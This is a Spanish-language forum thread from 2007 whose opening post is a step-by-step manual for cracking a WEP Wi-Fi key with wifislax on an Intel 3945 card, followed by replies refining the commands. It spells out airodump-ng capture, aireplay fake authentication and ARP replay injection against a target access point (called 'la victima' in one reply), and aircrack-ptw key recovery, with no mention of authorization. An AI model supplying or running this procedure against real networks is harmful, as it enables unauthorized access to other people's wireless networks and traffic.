elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 09:50  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux (Moderadores: Uxio, pianista, ChimoC)
| | | |-+  Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: [1] 2 3 4 5 6 7 8 Ir Abajo Respuesta Imprimir
Autor Tema: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG  (Leído 98,541 veces)
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« en: 27 Agosto 2007, 13:34 »

Esta nueva versión de wifislax se puede inyectar tráfico y capturarlo con la tarjeta wifi ipw 3945. Pero no solo eso además permite conectarse a internet con esta tarjeta.

1º Cargar la distribución:
Metemos el cd con la imagen grabada en el ordenador y luego reiniciamos, si tenemos la BIOS bien configurada con arranque de cd en primer lugar, pues cargará la distribución.

2º Empezar a arrancar:
Una vez que nos sale la pantalla como del linux y se nos queda boot: damos a enter, luego nos da a elegir varias opciones directamente la primera a enter. Y ya a esperar.
Después de unos minutos te dirá inicia sesión, pones primero root, y luegos toor. Cuando ya has iniciado sesión pones: startx

3º En el entorno, activar el adaptador para inyectar:
Gracias a los creadores de la distribución esto es muy facil:
-Inicio/wifislax/drivers/intel pro wireless/intel pro wireless 3945 inyection (las rutas no son exactas, pero tienen nombres parecidos)
-Carga el script, luego cuando se ha cargado completamente cierra la ventana (a mi no me iba ayer sin cerrarla)

4º Preparar el adaptador:
Este paso no le considero necesario, pero pongo estos dos comandos, que hay que poner en la shell de linux:
Citar
ifconfig wifi0 up
Citar
iwconfig wifi0 rate 1M

5º Empezamos a capturar y preparamos el entorno:
Aconsejo abrir 4 o 5 shell para trabajar con comodidad y poner en cada una un trabajo,
En este paso ponemos a capturar datos con este comando:
Citar
airodump-ng -w f --channel (canal) wifi0
Si no sabemos cual es el canal del router podemos ir probando canales o ignorar el comando de los canales..

6º En otra consola empezamos a inyectar:
Citar
aireplay -1 0 -a (BSSID) -e (ESSID) -h (MacNuestro) wifi0
-El Bssid sale durante la captura, le copiamos, el essid también sale durante la captura le copiamos, y el MacNuestro es el número Mac de nuestra wifi, que se puede ver en:
Citar
ifconfig
(Para hacer esto podeís hacerlo en otra consola)
Donde pone adaptador wifi0 en HWAdress copias los primeros 6 grupos de números del principio, cambia los guiones por : y lo pones en MacNuestro. Si has hecho esto bien da a enter en el comando y empezará autentificarse en el router.

7º Inyectamos en serio
Ponemos en otra consola:
Citar
aireplay -3 -b (BSSID) -h (MacNuestro) wifi0
Damos a enter, esperamos de 5 a 10 minutos, si funciona empezará a subir los paquetes muy rápido en la consola de airodump.

8º descifrando
Cuando ya tenemos de 60.000 paquetes para arriba, paramos el airodump, hacemos dir y vemos como se llama el fichero .cap que se ha creado. Con ese dato hacemos lo siguiente:
Citar
aircrack-ptw (fichero.cap)
En unos segundos te aparecerá la clave, en dos codificaciones, copia principalmente la de Ascii aunque por seguridad copia también la otra por si la ha combertido mal, y ya tienes la clave de la wifi.

Saludos a todos, y espero que ayude a alguién este minimanual  ::)


« Última modificación: 27 Agosto 2007, 14:05 por Rey11 » En línea

pianista
Moderador
***
Desconectado Desconectado

Mensajes: 5.574


Hacking Wireless Live!


Ver Perfil WWW
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #1 en: 27 Agosto 2007, 13:37 »

Esta bien, solo una cosita, el aireplay -1 ponlo con 0, es decir que no se asocie cada 10 segundos, ya que se ha comprobado que en estos drivers muchas veces da problemas el no poner un 0
Saludos


En línea
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #2 en: 27 Agosto 2007, 13:53 »

Ok, es que a mi no me inyectaba si no lo ponía a 10, pero bueno, ahora lo cambio.
Saludos
En línea

kracus

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #3 en: 30 Agosto 2007, 15:01 »

Hola a todos !!
Una preguntilla este manual sirve para otra tarjeta que no sea la ipw 3945, como por ejemplo una Edimax con Chipset: Ralink rt73 ???

O se hace de forma distinta??

Gracias saludos.....


En línea
osiosiosi

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #4 en: 30 Agosto 2007, 16:12 »

Solo un apunte:Cuando dices "º descifrando
Cuando ya tenemos de 60.000 paquetes para arriba, paramos el airodump, hacemos dir y vemos como se llama el fichero .cap"

Mejor no pararlo ya que si lo haces y con 60.000 paquetes el aircrack no puede sacar la clave tendras que repetir el proceso desde 0. Dejarlo corriendo y el propio aircrack ira probando con los consiguientes paquetes segun se vayan pillando. Resumiendo, cuando llegue a esa cifra (a veces con 20000 es suficiente para el aircrack-ptw), correr el aircrack-ptw de la siguiente manera:  aircrack-ptw ficherocap.cap .

Pues eso, un pequeño apunte.
Suerte
En línea
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #5 en: 30 Agosto 2007, 21:21 »

Creo que si, miralo en la distribuión, de la misma forma que se carga la inyección para la ipw se hace igual para tu tarjeta, mira haber si está disponible.
osiosiosi, 60.000 con inyección son tan pocos paquetes que si no funciona pues no cuesta nada ponerlo más rato porque inyectar 60.000 paquetes se hace en 3 minutos.
Saludos
En línea

pianista
Moderador
***
Desconectado Desconectado

Mensajes: 5.574


Hacking Wireless Live!


Ver Perfil WWW
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #6 en: 30 Agosto 2007, 21:47 »

Con una ralink sera mas facil ya que solo tendras una interfaz...
Te recomiendo que te leas el manual de Uxio
Saludos
PD:A veces el dir no funciona en linux ya que es un alias, asi que mejor usar ls
En línea
Rey11


Desconectado Desconectado

Mensajes: 3.244



Ver Perfil WWW
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #7 en: 30 Agosto 2007, 22:01 »

Ya, en algunas no funcionan el dir como hax-puppy, a mi en esta me funciona.
Saludos
En línea

dj_king

Desconectado Desconectado

Mensajes: 42


Ver Perfil
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #8 en: 2 Septiembre 2007, 14:02 »

Una pregunta. Los paquetes y las data son lo mismo? Es que ami las datas como q no me suben, pero los paquetes i que suben mu rapido.  :-[
En línea
pianista
Moderador
***
Desconectado Desconectado

Mensajes: 5.574


Hacking Wireless Live!


Ver Perfil WWW
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #9 en: 2 Septiembre 2007, 14:43 »

No es lo mismo, los datas es un tipo de paquetes de control llamado ivs, que contienen informacion de la clave WEP
Saludos
En línea
dj_king

Desconectado Desconectado

Mensajes: 42


Ver Perfil
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #10 en: 2 Septiembre 2007, 16:51 »

Solo un apunte:Cuando dices "º descifrando
Cuando ya tenemos de 60.000 paquetes para arriba, paramos el airodump, hacemos dir y vemos como se llama el fichero .cap"

Mejor no pararlo ya que si lo haces y con 60.000 paquetes el aircrack no puede sacar la clave tendras que repetir el proceso desde 0. Dejarlo corriendo y el propio aircrack ira probando con los consiguientes paquetes segun se vayan pillando. Resumiendo, cuando llegue a esa cifra (a veces con 20000 es suficiente para el aircrack-ptw), correr el aircrack-ptw de la siguiente manera:  aircrack-ptw ficherocap.cap .

Pues eso, un pequeño apunte.
Suerte


Pregunta.. y si no paramos el airodump...¿Como sabemos el nombre del archivo? Y como se cierra sin perder los datos que ha pillado? Muchas gracias. Estoy aprendiendo gracias a vosotros :D
« Última modificación: 2 Septiembre 2007, 17:13 por dj_king » En línea
osiosiosi

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #11 en: 2 Septiembre 2007, 17:15 »

Hola dj_king,

El nombre de lfichero se lo has especificado anteriormente al airodump asi:

airodump-ng -w nombre_de_fichero nomre_de_tu_interfaz_wifi

El fichero sera en este caso: nombre_de_fichero.cap y estara ubicado en el direcorio desde el que hayas ejecutado el comando airodump-ng.

Y ya te digo, mejor no pararlo y ejecutar aircrack ruta_de_nombre_de_fichero.cap asi el solo ira cogiendo los IVs a medida que el airodump los vaya generando en el fichero. Si, claro que puedes parar el airodump, ningun problema, solo que como ya dije, si los IVs "cazados" no son suficientes el aircrack no va a sacar la WEP y vas a tenet que empezar de 0. Ya, ya,....., igual para algunos volver a cazar 60000 de nuevo es cosa de 2 minutos, pero para otros no. Sin mas.

venga, un saludo
En línea
dj_king

Desconectado Desconectado

Mensajes: 42


Ver Perfil
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #12 en: 2 Septiembre 2007, 17:47 »

Hola dj_king,

El nombre de lfichero se lo has especificado anteriormente al airodump asi:

airodump-ng -w nombre_de_fichero nomre_de_tu_interfaz_wifi

El fichero sera en este caso: nombre_de_fichero.cap y estara ubicado en el direcorio desde el que hayas ejecutado el comando airodump-ng.

Y ya te digo, mejor no pararlo y ejecutar aircrack ruta_de_nombre_de_fichero.cap asi el solo ira cogiendo los IVs a medida que el airodump los vaya generando en el fichero. Si, claro que puedes parar el airodump, ningun problema, solo que como ya dije, si los IVs "cazados" no son suficientes el aircrack no va a sacar la WEP y vas a tenet que empezar de 0. Ya, ya,....., igual para algunos volver a cazar 60000 de nuevo es cosa de 2 minutos, pero para otros no. Sin mas.

venga, un saludo

Pues el paso de ponerle el nombre yo me lo tuve que saltar al principio y no se lo puse seguro :-[ Haber. Resumidamente, tengo ya la victima por llamarlo de algun modo, me asocio, te ago un ataque 3. Cuando hay que generar el nombre del archivo, en que momento. Gracias
En línea
osiosiosi

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #13 en: 2 Septiembre 2007, 19:42 »

Resumiendo:

1. airodump-ng -c canal_del_ap --bssid nombre_del_ap -w fichero_de_captura nombre_de tu_interfaz_wifi

2. aireplay-ng -1 10 -e nombre_del_ap -a mac_del_ap -h tu_mac

3. aireplay-ng -3 -b mac_del_ap -h tu_mac nombre_de tu_interfaz_wifi *

* el paso 2 no seria necesario en caso de que hubiera cliente(s) ya asociados al ap o punto de acceso en cuestion. En ese caso el punto 3 seria:

 aireplay-ng -3 -b mac_del_ap -h mac_cliente_ya asociado nombre_de tu_interfaz_wifi *

aunque no pasa nada si ejecutas el paso 2 en esta situacion..

Bueno, espero que solvente tus dudas. De todas formas mirate los tutoriales que rulan por el foro que te lo explican todo mas extenso.

Venga un saludo
En línea
dj_king

Desconectado Desconectado

Mensajes: 42


Ver Perfil
Re: Mini Manual, como inyectar con wifislax 3.1 en una ipw 3945 ABG
« Respuesta #14 en: 2 Septiembre 2007, 20:42 »

Resumiendo:

1. airodump-ng -c canal_del_ap --bssid nombre_del_ap -w fichero_de_captura nombre_de tu_interfaz_wifi

2. aireplay-ng -1 10 -e nombre_del_ap -a mac_del_ap -h tu_mac

3. aireplay-ng -3 -b mac_del_ap -h tu_mac nombre_de tu_interfaz_wifi *

* el paso 2 no seria necesario en caso de que hubiera cliente(s) ya asociados al ap o punto de acceso en cuestion. En ese caso el punto 3 seria:

 aireplay-ng -3 -b mac_del_ap -h mac_cliente_ya asociado nombre_de tu_interfaz_wifi *

aunque no pasa nada si ejecutas el paso 2 en esta situacion..

Bueno, espero que solvente tus dudas. De todas formas mirate los tutoriales que rulan por el foro que te lo explican todo mas extenso.

Venga un saludo

Me las explicado de futisima mare. Decirte solo una cosita. Ya saque mi propia wep, pero com mi pc conectado como cliente para capturar datas. Si no hay clientes conectados, de la otra forma que tu dices, se capturan datas a buena velocidad? Gracias
En línea
Páginas: [1] 2 3 4 5 6 7 8 Ir Arriba Respuesta Imprimir 

Ir a:  

Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines